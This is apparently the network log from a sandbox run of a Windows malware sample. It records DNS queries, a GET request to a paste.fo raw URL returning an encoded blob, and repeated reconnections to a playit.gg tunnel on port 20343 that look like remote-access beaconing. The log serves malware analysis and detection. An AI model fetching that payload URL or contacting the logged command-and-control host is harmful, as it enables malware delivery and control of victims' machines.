              Aug 8, 2024 02:36:24.446732044 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.446787119 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.446849108 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.446865082 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.446976900 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.446984053 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.447067022 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.447073936 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.447125912 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.447674036 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.447736979 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.447741985 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.447776079 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.447810888 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.447810888 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.447818041 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.447873116 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.447880030 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.447959900 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.448256016 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.448302031 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.448314905 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.448368073 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.448371887 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.448424101 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.448430061 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.448510885 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.448999882 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.449126005 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.500478983 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.500572920 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.500606060 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.500737906 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.500747919 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.500824928 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.500825882 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.500852108 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.500910997 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.500910997 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.500931025 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.501085997 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.533654928 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.533724070 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.579476118 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.579571962 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.579591036 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.579678059 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.580095053 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.580176115 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.580183029 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.580282927 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.580878019 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.580944061 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.581470013 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.581531048 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.581558943 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.581821918 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.582256079 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.582309008 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.583092928 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.583162069 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.583204985 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.583255053 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.587337017 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.587424994 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.587475061 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.587481976 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.587523937 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.587523937 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.587960958 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.588017941 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.588047981 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.588145018 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.621376991 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.621500015 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.621505022 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.621537924 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:24.621577024 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.621577024 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.621613979 CEST49739443192.168.2.4104.21.28.76
              Aug 8, 2024 02:36:24.621632099 CEST44349739104.21.28.76192.168.2.4
              Aug 8, 2024 02:36:26.755485058 CEST4973120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:26.760746956 CEST2034349731147.185.221.16192.168.2.4
              Aug 8, 2024 02:36:27.601955891 CEST2034349731147.185.221.16192.168.2.4
              Aug 8, 2024 02:36:27.602051973 CEST4973120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:30.989034891 CEST4973120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:30.990709066 CEST4974020343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:30.994544983 CEST2034349731147.185.221.16192.168.2.4
              Aug 8, 2024 02:36:30.996361971 CEST2034349740147.185.221.16192.168.2.4
              Aug 8, 2024 02:36:30.996459007 CEST4974020343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:31.026499033 CEST4974020343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:31.032362938 CEST2034349740147.185.221.16192.168.2.4
              Aug 8, 2024 02:36:44.411330938 CEST4974020343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:44.416395903 CEST2034349740147.185.221.16192.168.2.4
              Aug 8, 2024 02:36:52.383972883 CEST2034349740147.185.221.16192.168.2.4
              Aug 8, 2024 02:36:52.384149075 CEST4974020343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:53.755251884 CEST4974020343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:53.757356882 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:53.760410070 CEST2034349740147.185.221.16192.168.2.4
              Aug 8, 2024 02:36:53.762813091 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:36:53.763020992 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:53.805351973 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:36:53.810736895 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:07.020849943 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:07.333005905 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:07.524631023 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:07.526546001 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:10.458077908 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:10.464673042 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:11.427078962 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:11.432766914 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:12.303143024 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:12.312433004 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:13.583539963 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:13.589796066 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:13.801913023 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:13.807581902 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:13.928436995 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:13.933806896 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:13.989367008 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:13.995143890 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:15.181395054 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:15.181684017 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:19.006165981 CEST4974120343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:19.009916067 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:19.011718988 CEST2034349741147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:19.015382051 CEST2034349743147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:19.015631914 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:19.109487057 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:19.310761929 CEST2034349743147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:20.645476103 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:20.650861979 CEST2034349743147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:24.161261082 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:24.166687012 CEST2034349743147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:24.817415953 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:24.837595940 CEST2034349743147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:26.645503044 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:26.650785923 CEST2034349743147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:35.395586014 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:35.401371002 CEST2034349743147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:39.553999901 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:39.559753895 CEST2034349743147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:40.383708954 CEST2034349743147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:40.383795023 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:44.551465034 CEST4974320343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:44.557008028 CEST2034349743147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:44.557835102 CEST4974420343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:44.564554930 CEST2034349744147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:44.564629078 CEST4974420343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:44.606161118 CEST4974420343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:44.610914946 CEST2034349744147.185.221.16192.168.2.4
              Aug 8, 2024 02:37:53.473609924 CEST4974420343192.168.2.4147.185.221.16
              Aug 8, 2024 02:37:53.478686094 CEST2034349744147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:05.966955900 CEST2034349744147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:05.967111111 CEST4974420343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:10.035933971 CEST4974420343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:10.041105986 CEST2034349744147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:10.043289900 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:10.048877001 CEST2034349745147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:10.048970938 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:10.096297026 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:10.101852894 CEST2034349745147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:20.239388943 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:20.244415998 CEST2034349745147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:20.255114079 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:20.260452032 CEST2034349745147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:20.286277056 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:20.291503906 CEST2034349745147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:20.333023071 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:20.338212013 CEST2034349745147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:20.395731926 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:20.401077032 CEST2034349745147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:26.582948923 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:26.588355064 CEST2034349745147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:31.418616056 CEST2034349745147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:31.418723106 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:35.552031994 CEST4974520343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:35.557674885 CEST2034349745147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:35.600383043 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:35.605916977 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:35.606029034 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:35.664263010 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:35.672635078 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:35.754786015 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:35.760046959 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:36.849044085 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:36.854626894 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:40.864389896 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:40.869956970 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:40.942393064 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:40.948041916 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:40.958134890 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:40.963480949 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:41.020468950 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:41.026542902 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:41.036175013 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:41.041132927 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:41.145818949 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:41.151103020 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:41.161236048 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:41.166357040 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:41.192459106 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:41.197916985 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:41.239301920 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:41.244887114 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:51.270566940 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:38:51.276165962 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:56.979634047 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:38:56.979851007 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:01.350532055 CEST4974620343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:01.356179953 CEST2034349746147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:01.362129927 CEST4974720343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:01.367858887 CEST2034349747147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:01.368012905 CEST4974720343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:01.427769899 CEST4974720343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:01.433238983 CEST2034349747147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:03.098787069 CEST4974720343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:03.104165077 CEST2034349747147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:06.927217007 CEST4974720343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:06.932713032 CEST2034349747147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:18.947268009 CEST4974720343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:18.952621937 CEST2034349747147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:22.730789900 CEST2034349747147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:22.731257915 CEST4974720343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:27.098586082 CEST4974720343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:27.103668928 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:27.103996992 CEST2034349747147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:27.109141111 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:27.109328985 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:27.160307884 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:27.165425062 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:40.631170034 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:40.637993097 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:42.911227942 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:42.916847944 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:44.162189960 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:44.167587042 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:44.461373091 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:44.468125105 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:44.833352089 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:45.051547050 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:45.056802034 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:45.058475018 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:46.585501909 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:46.590909004 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:46.770541906 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:46.780005932 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:48.466545105 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:48.473171949 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:53.004923105 CEST4974820343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:53.010464907 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:53.010540962 CEST2034349748147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:53.015652895 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:53.015850067 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:53.052258015 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:53.057212114 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:53.083250046 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:53.090679884 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:53.130085945 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:53.135382891 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:53.161791086 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:53.166975021 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:53.271959066 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:53.277009964 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:53.364308119 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:53.369699955 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:39:54.145683050 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:39:54.151221991 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:40:05.708097935 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:40:05.713519096 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:40:06.098608971 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:40:06.105479956 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:40:14.435059071 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:40:14.435314894 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:40:20.223577023 CEST4974920343192.168.2.4147.185.221.16
              Aug 8, 2024 02:40:20.224728107 CEST4975020343192.168.2.4147.185.221.16
              Aug 8, 2024 02:40:20.228650093 CEST2034349749147.185.221.16192.168.2.4
              Aug 8, 2024 02:40:20.229650974 CEST2034349750147.185.221.16192.168.2.4
              Aug 8, 2024 02:40:20.229748011 CEST4975020343192.168.2.4147.185.221.16
              Aug 8, 2024 02:40:20.252666950 CEST4975020343192.168.2.4147.185.221.16
              Aug 8, 2024 02:40:20.257510900 CEST2034349750147.185.221.16192.168.2.4
              Aug 8, 2024 02:40:34.459342957 CEST4975020343192.168.2.4147.185.221.16
              Aug 8, 2024 02:40:34.464875937 CEST2034349750147.185.221.16192.168.2.4
              Aug 8, 2024 02:40:41.606859922 CEST2034349750147.185.221.16192.168.2.4
              Aug 8, 2024 02:40:41.606996059 CEST4975020343192.168.2.4147.185.221.16
              TimestampSource PortDest PortSource IPDest IP
              Aug 8, 2024 02:36:00.800692081 CEST6081353192.168.2.41.1.1.1
              Aug 8, 2024 02:36:00.813788891 CEST53608131.1.1.1192.168.2.4
              Aug 8, 2024 02:36:06.168222904 CEST5153353192.168.2.41.1.1.1
              Aug 8, 2024 02:36:06.181755066 CEST53515331.1.1.1192.168.2.4
              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Aug 8, 2024 02:36:00.800692081 CEST192.168.2.41.1.1.10xb0bdStandard query (0)paste.foA (IP address)IN (0x0001)false
              Aug 8, 2024 02:36:06.168222904 CEST192.168.2.41.1.1.10xbebStandard query (0)cameras-commitment.gl.at.ply.ggA (IP address)IN (0x0001)false
              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Aug 8, 2024 02:36:00.813788891 CEST1.1.1.1192.168.2.40xb0bdNo error (0)paste.fo104.21.28.76A (IP address)IN (0x0001)false
              Aug 8, 2024 02:36:00.813788891 CEST1.1.1.1192.168.2.40xb0bdNo error (0)paste.fo172.67.144.225A (IP address)IN (0x0001)false
              Aug 8, 2024 02:36:06.181755066 CEST1.1.1.1192.168.2.40xbebNo error (0)cameras-commitment.gl.at.ply.gg147.185.221.16A (IP address)IN (0x0001)false
              • paste.fo
              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.449730104.21.28.764436872C:\Users\user\Desktop\SecuriteInfo.com.Heur.Mint.Phil.57.5869.22404.exe
              TimestampBytes transferredDirectionData
              2024-08-08 00:36:01 UTC73OUTGET /raw/9c15a0ff5499 HTTP/1.1
              User-Agent: WebReader
              Host: paste.fo
              2024-08-08 00:36:01 UTC834INHTTP/1.1 200 OK
              Date: Thu, 08 Aug 2024 00:36:01 GMT
              Content-Type: text/plain;charset=UTF-8
              Transfer-Encoding: chunked
              Connection: close
              Set-Cookie: PHPSESSID=e6dnf9kqraq7evsug8ep2l8pp2; path=/
              Set-Cookie: token=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0
              Expires: Thu, 19 Nov 1981 08:52:00 GMT
              Cache-Control: no-store, no-cache, must-revalidate
              Pragma: no-cache
              Vary: Accept-Encoding
              CF-Cache-Status: DYNAMIC
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NXgM4SyJ0IwHYtOjtQvbmlq8%2Be68RqmWe6OGSjD3t6793AYTuL2ocQk9t4kjEhdl%2Bx07f07ycixT4G6QIFhJSkVtzO8xF5Xn3MBCaqzLPxrUSuiQbwfLBSPUrg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8afb6e04fb9317e9-EWR
              alt-svc: h3=":443"; ma=86400
              2024-08-08 00:36:01 UTC535INData Raw: 34 37 66 64 0d 0a 68 51 52 54 45 6f 7a 32 74 6a 51 4d 57 7a 67 2f 6b 6a 52 5a 58 4e 67 37 59 42 77 66 69 38 2f 46 54 62 4f 62 76 55 2f 61 31 59 35 2b 30 42 2b 34 74 48 54 65 43 58 39 62 6d 34 71 50 4c 44 68 7a 63 53 56 47 32 65 54 71 53 74 36 59 56 78 75 6f 6c 35 2b 6b 4b 38 39 44 44 66 62 62 53 50 35 61 6b 77 47 6e 50 68 5a 65 45 51 7a 50 37 73 78 59 47 4c 56 52 2b 76 59 7a 31 4e 67 44 68 58 55 45 6d 58 6f 59 33 63 6b 6f 39 33 6c 6f 6b 42 64 46 67 35 53 55 41 73 39 53 59 6b 79 52 34 38 4a 2b 73 4c 59 6f 34 30 73 4a 65 5a 45 45 6a 68 4a 78 47 66 43 47 43 41 65 62 72 72 73 49 30 76 32 75 4e 2f 6a 4f 4a 72 67 46 68 56 77 34 4b 46 73 59 6c 5a 69 35 74 76 65 72 53 73 67 54 6a 31 51 34 44 6b 78 52 63 43 2f 5a 65 74 30 69 46 76 4f 57 58 34 68 52 4f 65 65 6a 42
              Data Ascii: 47fdhQRTEoz2tjQMWzg/kjRZXNg7YBwfi8/FTbObvU/a1Y5+0B+4tHTeCX9bm4qPLDhzcSVG2eTqSt6YVxuol5+kK89DDfbbSP5akwGnPhZeEQzP7sxYGLVR+vYz1NgDhXUEmXoY3cko93lokBdFg5SUAs9SYkyR48J+sLYo40sJeZEEjhJxGfCGCAebrrsI0v2uN/jOJrgFhVw4KFsYlZi5tverSsgTj1Q4DkxRcC/Zet0iFvOWX4hROeejB
